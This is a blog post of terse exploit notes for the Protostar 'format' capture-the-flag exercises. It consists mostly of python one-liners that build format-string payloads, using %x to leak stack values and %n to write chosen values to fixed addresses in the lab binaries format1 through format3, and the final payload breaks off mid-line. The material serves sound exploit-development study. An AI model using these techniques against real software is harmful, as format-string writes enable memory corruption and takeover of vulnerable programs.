Showing posts from December, 2016

Exploit Exercises - Format String

Format1:
Padding up to the last memory dump:
run `python -c 'print "\x38\x96\x04\x08"+"AAABB"+"%x."*143'`%x
Write
run `python -c 'print "\x38\x96\x04\x08"+"AAABB"+"%x."*143'`%n
DMA
/opt/protostar/bin/format1 `python -c 'print "CC"+"\x38\x96\x04\x08"+"AAA%142$n"'`
Format2: need to write a value to an address:
POC:
python -c 'print "\xe4\x96\x04\x08%42x"+"%x."*2+"%n"' > foo
|Address|Value|Padding|%n

DMA
python -c 'print "\xe4\x96\x04\x08"+"%60u%4$n"'  |  /opt/protostar/bin/format2

Format3: write 4 bytes to a specified address:
POC:
python -c 'print "\xf4\x96\x04\x08"+"%x"*10+"%11x%n"+"BB"+"\xf5\x96\x04\x08"+"%x"*6+"%475x%n"+"B"+"\xf6\x96\x04\x08"+"%x"*4+"%136x%n"+"B"+"\xf7\x96\x04\x08"+"%x&qu…